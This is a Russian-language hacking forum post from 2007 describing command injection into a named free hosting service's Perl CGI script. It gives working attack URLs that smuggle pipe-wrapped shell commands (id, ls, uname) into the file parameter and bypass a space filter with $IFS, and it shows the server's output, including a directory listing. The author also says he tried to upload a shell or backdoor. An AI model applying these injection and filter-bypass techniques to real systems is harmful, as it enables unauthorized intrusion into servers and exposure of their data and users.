Форум АНТИЧАТ - Уязвимость хостинга!-=sbn.bz=-

Недавно читал старый номер ][ , нашел статью FORBA о том как он ломал один хостинг. Вот и решил порыть тоже и нашел очень интересную дыру (cgi)в sbn.bz -тут можно зарегать бесплатный сайт(типа народа).

Для начала я зарегал себе акк - xxx.pbnet.ru
Затем попав в панель редактирования моего нового проекта, я увидел ссылку :Загрузка файлов на сервер: в самом низу страницы. Осмотрелся и решил попробовать загрузить файлик с компа, затем решил создать файл в панели. Ввел имя файла hackme.txt, выбрал простой редактор и нажал создать.

Вот строка сост.браузера после создания

Код:

http://sbn.bz/cgi-bin/file_viewer.pl?file=hackme.txt&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&l=1&a=edit_file

Затем ввел произвольных текст в файл blabla и сохранил.
После создания файла я решил просмотреть файл

Код:

http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=hackme.txt&l=1

И вот заметил интересное

&file=hackme.txt&l=1

Тут меня осенило, а если вместо hackme.txt вставить пайпы с командой внутри --|id| и что вы думаете все прокатило и я увидел мои права на сервере

uid=515(www) gid=510(www) groups=510(www)

Затем по обычной схеме я решил проверить ОС, но команда uname -a не выполнилась, но я сразу понял в чем дело. Просто пробел фильтровался перловым скриптом его я заменил $IFS.

Код:

http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|uname$IFS-a|&l=1

Но опять неудача :(!
Решил вывести листинг файлов на сервере и тут все вышло

Код:

http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|ls$IFS-la|

А вот и файлы

Код:

total 336

drwxr-xr-x  15 root       root        4096 Apr 14 18:26 .

drwxr-xr-x   9 root       root        4096 Mar 22  2006 ..

-rw-r--r--   1 root       root          96 Dec  8  2005 .htaccess

drwxr-xr-x   4 root       root        4096 Apr 29 17:11 Modules

drwxr-xr-x   4 root       root        4096 May 16  2006 _admin

drwxr-xr-x   2 root       root        4096 Jun 29  2006 admin_

-rwxrwxrwx   1 apacheuser apacheuser  4693 Oct 11  2006 auth.pl

drwxr-xr-x   5 root       root        4096 Dec 22  2003 bn

-rwxr-xr-x   1 root       root         413 Nov 14 01:33 cenzure_includes.pl

-rwxr-xr-x   1 apacheuser apacheuser 14111 Jun 20  2006 file_viewer.pl

-rwxr-xr-x   1 apacheuser apacheuser   954 Jul 11  2005 full_img.pl

-rwxr-xr-x   1 apacheuser apacheuser  3819 May  2  2005 full_img.pl.old

-rwxr-xr-x   1 apacheuser apacheuser  2368 Jan 12  2004 hosting.pl

drwxr-xr-x   2 root       root        4096 Jun 25  2004 ibill

-rwxr-xr-x   1 apacheuser apacheuser  9481 Jun 20  2006 img_viewer.pl

-rwxr-xr-x   1 apacheuser apacheuser   229 Jan 21  2004 link.pl

-rwxr-xr-x   1 apacheuser apacheuser  3702 Jan 23  2004 lost_pwd.pl

drwxr-xr-x   2 root       root        4096 Oct  5  2006 mod

drwxr-xr-x   2 root       root        4096 Sep  4  2006 ntps

-rwxr-xr-x   1 root       root        7505 Jul 28  2006 ntps_adsfree.pl

drwxr-xr-x   2 root       root        4096 Apr 29 00:47 parser

drwxr-xr-x   3 root       root        4096 May  2  2005 paypal

-rwxr-xr-x   1 apacheuser apacheuser  3207 Dec 22  2003 redirect.pl

-rwxr-xr-x   1 apacheuser apacheuser 13254 Apr 22  2006 reg.pl

drwxr-xr-x   2 root       root        4096 Dec 23  2003 rupay

-rwxr-xr-x   1 apacheuser apacheuser  2993 Jun 20  2006 save_template.pl

-rwxr-xr-x   1 apacheuser apacheuser  6259 Dec 22  2003 show.pl

-rwxr-xr-x   1 root       root        4324 Sep  4  2006 sms_adsfree.pl

-rwxr-xr-x   1 root       root         290 May 26  2006 unsubscribe.pl

-rwxr-xr-x   1 apacheuser apacheuser  6515 Jun 20  2006 upd.pl

drwxr-xr-x   2 root       root        4096 Mar 22  2006 upload

drwxr-xr-x   2 root       root        4096 Feb 15 19:17 view

-rwxr-xr-x   1 apacheuser apacheuser 12732 Apr  9  2006 view.pl

-rwxr-xr-x   1 apacheuser apacheuser 12347 Mar  9  2006 view.pl.bak

-rwxr-xr-x   1 apacheuser apacheuser  3866 Mar 22  2006 view_templates.pl

drwxr-xr-x  12 apacheuser apacheuser  4096 Jul  3  2005 webtools

Дальше выполнил pwd -- /var/www/html/sbn/cgi-bin
Но опять натолкнулся на ж...Если вставить в пайпы запрос вида --- cd$IFS/var/www/html/sbn/cgi-bin;ls, ничего опять не выполняется, скрипт просто режит мой запрос.

; --режит. Ковырялся долго, но так и не залил не шелл не бекдор.

Нашел еще как можно выполнить команды которые не выполнялись выше например ls

Код:

http://sbn.bz/cgi-bin/file_viewer.pl?sid=NHwfwuwredtttgnVBrUU4acLimAs6TrU&file=/|ls|&dir=

К вашей сессии добавляем &file=/|ls|&dir= и все сохраняем, затем видим в директории файл с названием |ls| просмотрим его и видем листинг файлов!

А если выполнить тоже самое только ls$IFS-la|
без сохранения тоже выводит файлы только в редакторе, а не при просмотре созданного файла! :)

Код:

http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&file=/|ls$IFS-la|&dir=

Просматривать файлы тоже можно!!!
Вот так за полчаса я зарегал себе сайт и нашел брешь, так что надо уволить прогаммиста.

Спасибо за внимание. (с) fly 2007